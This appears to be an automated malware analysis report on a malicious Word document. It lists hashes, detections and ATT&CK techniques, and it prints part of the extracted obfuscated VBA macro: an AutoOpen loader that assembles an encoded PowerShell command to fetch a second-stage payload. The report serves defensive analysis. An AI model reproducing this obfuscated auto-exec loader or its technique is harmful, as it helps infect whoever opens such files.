Office (OLE) malware analysis — malicious · f7e386532623a454

MALICIOUS

Office (OLE)

107.5 KB Created: 2018-07-06 15:57:00 Authoring application: Microsoft Office Word First seen: 2018-11-13

MD5: 4078916035aa19c8fed39fb9bf651a98 SHA-1: 82a6a932f2624eefca68c3375409bee54ee89600 SHA-256: f7e386532623a4545b5625b99d0d2dbfebba9a2000dcdb8eddcabc276e97d2b9

342 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro triggers a call to a function that constructs and executes a PowerShell command. This command appears to be designed to download and execute a second-stage payload, as indicated by the use of 'wershel l' and other obfuscated strings that likely form a command-line invocation.

Heuristics 9

ClamAV: Doc.Dropper.Agent-6602967-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6602967-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12239 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12239 bytes
SHA-256: `0a4af82210c04a46ce709dd7bca3b5e5e59b9b956e089f154b7f0dc0bbc02063`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "zvclOVHuA" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next sdnzJ = (EjKzQi - XRQvE * 80629 * UXWcGX / (73136 - bddXv)) IrYjLh = (ATjZBP - TYzoW * 41058 * LWAJib / (50243 - zFwXs)) shoih = (KJBvk - cKVcDM * 23868 * iaNVkI / (76906 - OTAlY)) AZMIH = (qKRwWq - oATCTz * 38699 * Lqlvl / (10742 - WtiCqz)) UiTmuA = (jzASEM - Gwdka * 77840 * USuYY / (73090 - hvzOwi)) GqaRizERbdQ (MWoUArUHCHR + nqisdL + kQJVIoWuhL) aRoBqN = (RDbAH - WAzpJ * 1072 * YNWOl / (3894 - BEGdX)) End Sub Attribute VB_Name = "DTlnaGwcV" Function MWoUArUHCHR() On Error Resume Next ZvkFsc = bLuXwa * 89473 * uKpZaH - wLkPj * (XsAMak - vqLqVF) * 81546 / itFOd + aDJkYm + wYVcv QjaqYvbrRO = "wershel" + "l " + " " + " &" + Chr(40) + " $SheLLi" + "d[1]" + Chr(43) + "$She" liWip = kudlKZ * 72012 * wzciRM - mfufUl * (RhPulv - AjrrG) * 39926 / zHthsV + TOXfYJ + zcwVol WPoqJv = kmLsD * 78148 * BzcQM - SsPMmY * (DsWSj - BldsB) * 23524 / AikUjF + bbAtY + fddAc tKVpN = DzzEVQ * 76029 * SiBCD - prcCwL * (SqNZwm - oikYQs) * 43834 / JfCVh + FqatDH + CiTrBz QWwuKMRUjtX = "Llid[13]" + Chr(43) + "'X'" + Chr(41) + " " + Chr(40) + "-jO" + "iN " + Chr(40) + "'8{" + "88A12" + "7i118T1" + "7<66" + "@73{" + "91<1" ocdXMC = UHKpmZ * 92476 * ZFEil - TaCiz * (hcYYJJ - HqrjW) * 75032 / kpNjjN + iZtsf + XVCatP PrQsIk = mYFaDV * 94391 * HvfjNa - rctJnY * (cQzaz - mUbXVY) * 77570 / vTUEi + WEzXYT + AnwzwO rjbOSWI = "B67p7" + "8p70@73" + "A79<8" + "8@12M98V7" + "3i88" + "V2{123<" + "73B78p11" + "1A64i" mbZXu = lQtpT * 84464 * MVtXz - wKrbob * (FWBqK - jZjjK) * 39062 / XEqCpO + bqjIq + KjHvzk QPPDiH = mfmiD * 18065 * uToma - dPmsA * (AzSlka - BHobw) * 21113 / woKwa + apmnGN + iLBcW ilfdSo = iZivB * 75780 * MTzkiD - fjdPj * (nQmHWi - HbDDuO) * 21697 / TKjsks + GvfiCn + FCNjD WHDkiXGhmb = "69V73i" + "66B88" + "A23T8{10" + "3M86V11" + "7p17T11" + "V68i88p" + "88V92T22" + "@3p3<" + "91{91B91" + "<2i74" SIsovT = fUmvz * 9523 * kfkOlZ - TJZzED * (piCPb - ASoGV) * 34612 / jBKrF + VKSFAu + DwzSo Opqkj = hhSrd * 87604 * BBSzi - TitXZB * (JUBSW - iCJrL) * 48623 / jDnrb + GaQCfA + uWhUSQ LUtCH = IOFsqb * 36456 * pEpSN - LNiiX * (tpGME - HznURu) * 35502 / SahuQ + rLWwmE + DvwpOf ONjzU = ORrJH * 49687 * NPvCw - vusSVS * (XHUpYu - ASqGrG) * 32672 / JZsYaN + HlSWTn + VvKhj wClMj = vZoKq * 62113 * kTazs - qAjWC * (CjwvvK - dkNWG) * 22995 / qlhzIj + kjCVNo + wGNfi WDvoTj = "{89B66" + "B72M77" + "{79p" + "69B67@" + "66@94p7" + "7M90p7" + "3M94" + "M77B2<7" + "9p67{65" + "V3<12" + "4T93p" ziszTC = WwTlB * 64899 * SlOWo - DtaiV * (hiArX - KEmDEI) * 24841 / SJFBcn + rnbRMw + iFEKd FakLqABi = "68V106" + "p122@92B1" + "23T90B" + "30{3p108" + "A68i88T88" + "p92<" + "22i3V3B91" + "<91B91" + "@2T65{7" + "7M92<" + "77T2i7" DpVHoS = lkSSiN * 14766 * hjPTpk - jjpTVl * (qlHHl - EsjcN) * 34644 / nNiSS + wNbWwz + UFpRVw WFvKrd = PhFJD * 94 * oYFijq - ZZLdvV * (zufGOi - zGSwzX) * 45973 / MDtOoQ + FvXfzz + kjvImQ IYDJhp = "2@73V65T6" + "7i77<69" + "M69i" + "66M72" + "p89M" + "95M88i9" + "4<69@73" + "V95{2i" + "79p67" + "M65@3" MWoUArUHCHR = QjaqYvbrRO + QWwuKMRUjtX + rjbOSWI + WHDkiXGhmb + WDvoTj + FakLqABi + IYDJhp hpGCCp = cJXaOo * 63748 * kjGPQ - lMEbP * (SiLth - pAATNW) * 86235 / RMjlj + jjcwUS + QwdBb Ruzisb = jTRTkX * 24932 * ZjTra - lFMYPR * (EXRlk - mXOCt) * 15591 / DNLfkv + MXzij + ufokF jLXbHj = AnGXav * 43388 * XAspn - PKKvf * (DPGQQY - jSvrVP) * 48029 / iqZPYi + uVDLzd + AMfbh Ybvzh = EajKdZ * 68816 * cYuhnU - MhaiC * (XGiiw - zSbRL) * 95494 / qhjMTI + cSHuCR + zMuVR End Function Function nqisdL() On Error Resume Next TKnRt = OwnUa * 77015 * nzcIQc - aGhDpi * (sYdlwd - wqXBV) * 20932 / hmuQo + oXhvka + jNckb UwfjJk = AGijC * 57358 * jUGZCv - zobfH * (GjwuSJ - Nihmw) * 28481 / RBLTO + XfaOrc + bVKEBC ioCVmzCc = "@110p1" + "03A25T" + " ... (truncated)

SHA-256: 0a4af82210c04a46ce709dd7bca3b5e5e59b9b956e089f154b7f0dc0bbc02063

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "zvclOVHuA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   sdnzJ = (EjKzQi - XRQvE * 80629 * UXWcGX / (73136 - bddXv))
   IrYjLh = (ATjZBP - TYzoW * 41058 * LWAJib / (50243 - zFwXs))
   shoih = (KJBvk - cKVcDM * 23868 * iaNVkI / (76906 - OTAlY))
   AZMIH = (qKRwWq - oATCTz * 38699 * Lqlvl / (10742 - WtiCqz))
   UiTmuA = (jzASEM - Gwdka * 77840 * USuYY / (73090 - hvzOwi))
GqaRizERbdQ (MWoUArUHCHR + nqisdL + kQJVIoWuhL)
   aRoBqN = (RDbAH - WAzpJ * 1072 * YNWOl / (3894 - BEGdX))
End Sub


Attribute VB_Name = "DTlnaGwcV"
Function MWoUArUHCHR()
On Error Resume Next
ZvkFsc = bLuXwa * 89473 * uKpZaH - wLkPj * (XsAMak - vqLqVF) * 81546 / itFOd + aDJkYm + wYVcv
QjaqYvbrRO = "wershel" + "l       " + "      " + "     &" + Chr(40) + " $SheLLi" + "d[1]" + Chr(43) + "$She"
liWip = kudlKZ * 72012 * wzciRM - mfufUl * (RhPulv - AjrrG) * 39926 / zHthsV + TOXfYJ + zcwVol
   WPoqJv = kmLsD * 78148 * BzcQM - SsPMmY * (DsWSj - BldsB) * 23524 / AikUjF + bbAtY + fddAc
   tKVpN = DzzEVQ * 76029 * SiBCD - prcCwL * (SqNZwm - oikYQs) * 43834 / JfCVh + FqatDH + CiTrBz
QWwuKMRUjtX = "Llid[13]" + Chr(43) + "'X'" + Chr(41) + " " + Chr(40) + "-jO" + "iN " + Chr(40) + "'8{" + "88A12" + "7i118T1" + "7<66" + "@73{" + "91<1"
ocdXMC = UHKpmZ * 92476 * ZFEil - TaCiz * (hcYYJJ - HqrjW) * 75032 / kpNjjN + iZtsf + XVCatP
   PrQsIk = mYFaDV * 94391 * HvfjNa - rctJnY * (cQzaz - mUbXVY) * 77570 / vTUEi + WEzXYT + AnwzwO
rjbOSWI = "B67p7" + "8p70@73" + "A79<8" + "8@12M98V7" + "3i88" + "V2{123<" + "73B78p11" + "1A64i"
mbZXu = lQtpT * 84464 * MVtXz - wKrbob * (FWBqK - jZjjK) * 39062 / XEqCpO + bqjIq + KjHvzk
   QPPDiH = mfmiD * 18065 * uToma - dPmsA * (AzSlka - BHobw) * 21113 / woKwa + apmnGN + iLBcW
   ilfdSo = iZivB * 75780 * MTzkiD - fjdPj * (nQmHWi - HbDDuO) * 21697 / TKjsks + GvfiCn + FCNjD
WHDkiXGhmb = "69V73i" + "66B88" + "A23T8{10" + "3M86V11" + "7p17T11" + "V68i88p" + "88V92T22" + "@3p3<" + "91{91B91" + "<2i74"
SIsovT = fUmvz * 9523 * kfkOlZ - TJZzED * (piCPb - ASoGV) * 34612 / jBKrF + VKSFAu + DwzSo
   Opqkj = hhSrd * 87604 * BBSzi - TitXZB * (JUBSW - iCJrL) * 48623 / jDnrb + GaQCfA + uWhUSQ
   LUtCH = IOFsqb * 36456 * pEpSN - LNiiX * (tpGME - HznURu) * 35502 / SahuQ + rLWwmE + DvwpOf
   ONjzU = ORrJH * 49687 * NPvCw - vusSVS * (XHUpYu - ASqGrG) * 32672 / JZsYaN + HlSWTn + VvKhj
   wClMj = vZoKq * 62113 * kTazs - qAjWC * (CjwvvK - dkNWG) * 22995 / qlhzIj + kjCVNo + wGNfi
WDvoTj = "{89B66" + "B72M77" + "{79p" + "69B67@" + "66@94p7" + "7M90p7" + "3M94" + "M77B2<7" + "9p67{65" + "V3<12" + "4T93p"
ziszTC = WwTlB * 64899 * SlOWo - DtaiV * (hiArX - KEmDEI) * 24841 / SJFBcn + rnbRMw + iFEKd
FakLqABi = "68V106" + "p122@92B1" + "23T90B" + "30{3p108" + "A68i88T88" + "p92<" + "22i3V3B91" + "<91B91" + "@2T65{7" + "7M92<" + "77T2i7"
DpVHoS = lkSSiN * 14766 * hjPTpk - jjpTVl * (qlHHl - EsjcN) * 34644 / nNiSS + wNbWwz + UFpRVw
   WFvKrd = PhFJD * 94 * oYFijq - ZZLdvV * (zufGOi - zGSwzX) * 45973 / MDtOoQ + FvXfzz + kjvImQ
IYDJhp = "2@73V65T6" + "7i77<69" + "M69i" + "66M72" + "p89M" + "95M88i9" + "4<69@73" + "V95{2i" + "79p67" + "M65@3"
MWoUArUHCHR = QjaqYvbrRO + QWwuKMRUjtX + rjbOSWI + WHDkiXGhmb + WDvoTj + FakLqABi + IYDJhp
   hpGCCp = cJXaOo * 63748 * kjGPQ - lMEbP * (SiLth - pAATNW) * 86235 / RMjlj + jjcwUS + QwdBb
   Ruzisb = jTRTkX * 24932 * ZjTra - lFMYPR * (EXRlk - mXOCt) * 15591 / DNLfkv + MXzij + ufokF
   jLXbHj = AnGXav * 43388 * XAspn - PKKvf * (DPGQQY - jSvrVP) * 48029 / iqZPYi + uVDLzd + AMfbh
   Ybvzh = EajKdZ * 68816 * cYuhnU - MhaiC * (XGiiw - zSbRL) * 95494 / qhjMTI + cSHuCR + zMuVR
End Function
Function nqisdL()
On Error Resume Next
TKnRt = OwnUa * 77015 * nzcIQc - aGhDpi * (sYdlwd - wqXBV) * 20932 / hmuQo + oXhvka + jNckb
   UwfjJk = AGijC * 57358 * jUGZCv - zobfH * (GjwuSJ - Nihmw) * 28481 / RBLTO + XfaOrc + bVKEBC
ioCVmzCc = "@110p1" + "03A25T" + "
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.